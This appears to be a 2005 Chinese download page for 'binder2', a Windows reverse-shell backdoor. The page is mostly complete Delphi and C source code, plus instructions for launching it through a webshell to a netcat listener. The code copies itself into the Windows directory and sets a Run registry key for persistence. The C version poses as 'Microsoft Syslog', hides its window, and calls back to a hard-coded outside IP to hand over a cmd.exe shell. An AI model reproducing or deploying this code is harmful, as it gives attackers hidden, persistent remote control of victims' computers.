Delphi 版 binder2 反弹式后门程序及工具
下载地址:http://downloads.2ccc.com/general/internet_lan/bander2.rar
Winsock2为kol socket单元文件,修改自c版代码binder2.c
使用说明:
binder2.exe 反弹式后门程序
简介:
在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用.
用法:
1. 在本地机器监听一个端口:
netcat -vv -l -p 80
2. 通过webShell或是别的什么运行后门:
kol_binder2 80 youIPadd
3. 本地监听端口将截获一个来自远程主机的cmd.
注意:
程序本身会创建一个自启动方法, 如果没有参数的命令,会连接默认IP和默认端口,这个exe默认的IP地址是内网地址127.0.0.1,端口1234.
程序会复制自身到c:/winnt/下名为binder2.exe,并在
HKEY_CURRENT_USER//Software//Microsoft//Windows//CurrentVersion//Run 下创建启动键. 如果需要卸载,请使用 kol_binder2 /kill 命令.(如果因权限问题,这些将不能执行,比如在wenshell中执行时.)
Code by hnxyy
Date:2005/6/16
QQ:19026695
program kol_binder2;
uses
Windows,Winsock2,winsock;
function StrToIntDef(const S: string; Default: Integer): Integer;
var
E: Integer;
begin
Val(S, Result, E);
if E <> 0 then Result := Default;
end;
var
mykey :HKEY;
buffer,cmd :array[0..MAX_PATH] of char;
si :TStartupInfo;
wd :TWSAdata;
sock :TSocket;
pi :TProcessInformation;
sin :TSockAddrIn;
ip :pchar;
port :integer;
begin
GetWindowsDirectory(buffer,MAX_PATH);
lstrcat(buffer,'/binder2.exe');
GetModuleFileName(hInstance,cmd,MAX_PATH);
CopyFile(cmd,buffer,false);
RegOpenKeyEx(HKEY_CURRENT_USER,'Software/Microsoft/Windows/CurrentVersion/Run',0,KEY_ALL_ACCESS,mykey);
RegSetValueEx(mykey,'binder2',0,REG_SZ,@buffer,sizeof(buffer));
if (ParamCount=1) and (lstrcmpi(lpstr(ParamStr(1)),'/kill')=0) then
begin
RegDeleteValue(MyKey,'binder2');
DeleteFile(buffer);
ExitProcess(0);
end;
if (ParamCount<1) or (ParamCount>2) then
begin
port :=1234;
ip :='127.0.0.1';
end else
begin
port :=StrToIntDef(ParamStr(1),0);
ip :=lpstr(ParamStr(2));
end;
//FillChar(si,sizeof(si),#0);
//WSAStartup($101,wd);
//sock :=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP);
ZeroMemory(@si, SizeOf(si));
WSAStartup(MAKEWORD(1,1),wd);
sock :=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, nil, 0, 0);
sin.sin_family :=AF_INET;
sin.sin_port :=htons(port);
sin.sin_addr.s_addr :=inet_addr(ip);
while (connect(sock,sin,sizeof(sin))<>0) do Sleep(30000);
si.cb :=sizeof(si);
si.dwFlags :=STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES;
si.wShowWindow :=SW_HIDE;
si.hStdInput :=sock;
si.hStdOutput :=sock;
si.hStdError :=sock;
CreateProcess(nil,'cmd.exe',nil,nil,TRUE,CREATE_NEW_CONSOLE,nil,nil,si,pi);
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseSocket(sock);
WSACleanup;
end.
附 binder2.exe c 版代码
/*
* Trivial Reverse cmd binder
*
* When LAN is full, ThreaT will walk on your network
*
******************************
compile : cl.exe binder2.c
Usage
_____
binder2.exe (backdoor the current workstation & connect to default IP for bind a cmd shell on default Port)
binder2.exe 123 (connect to default IP & bind a cmd shell on port 123)
binder2.exe 123 10.0.0.1 (connect to 10.0.0.1 & bind a cmd shell on port 123)
binder2 /kill (remove startkey of the registery)
******************************
*
* ThreaT@Ifrance.com
* http://s0h.cc/~threat/
*
*/
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
/* Win entry point (sa evite d'avoir une grosse console crade qui s'affiche ) */
int WINAPI WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpszCmdLine,
int nCmdShow
)
{
WSADATA wd;
HKEY MyKey;
SOCKET sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
struct sockaddr_in sin;
char buffer[MAX_PATH], cmd[MAX_PATH], *p,
IP[16] = "81.91.66.30/x00"; // adresse IP par default (ici www.s0h.cc)
unsigned short port = 1234; // port par default
/* backdoor le bordel */
GetWindowsDirectory (buffer,MAX_PATH);
lstrcat (buffer,"//syslog.exe/x00");
GetModuleFileName (NULL,cmd,MAX_PATH);
CopyFile (cmd,buffer,FALSE);
RegOpenKeyEx(HKEY_CURRENT_USER,"Software//Microsoft//Windows//CurrentVersion//Run",(DWORD)NULL,KEY_ALL_ACCESS,&MyKey);
RegSetValueEx (MyKey,"Microsoft Syslog",(DWORD)NULL,REG_SZ,( CONST BYTE * )&buffer,strlen (buffer));
/* traite les eventuels arguments */
p = strtok (lpszCmdLine," ");
if (lpszCmdLine[0] == '/' || IsCharAlphaNumeric(lpszCmdLine[0]))
{
if (!lstrcmpi (lpszCmdLine,"/kill")) { RegDeleteValue(MyKey,"Microsoft Syslog"); ExitProcess (0);}
else port = atoi (lpszCmdLine);
if ( p = strtok (NULL," ") ) lstrcpyn (IP,p,16);
}
/* prepare la sauce */
memset(&si, 0, sizeof(si));
WSAStartup(MAKEWORD( 1, 1 ), &wd);
// David Litchfield in his Blackhat talk said... (PJ)
sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(IP);
/* tente une connexion toute les 30 secondes */
while ( connect(sock, (struct sockaddr*)&sin, sizeof (sin)) ) Sleep (30000);
/* balance le shell et ce casse */
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
si.wShowWindow=SW_HIDE;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)sock;
CreateProcess(NULL,"cmd.exe",NULL,NULL, TRUE, 0,0, NULL, &si, &pi );
return 0;
}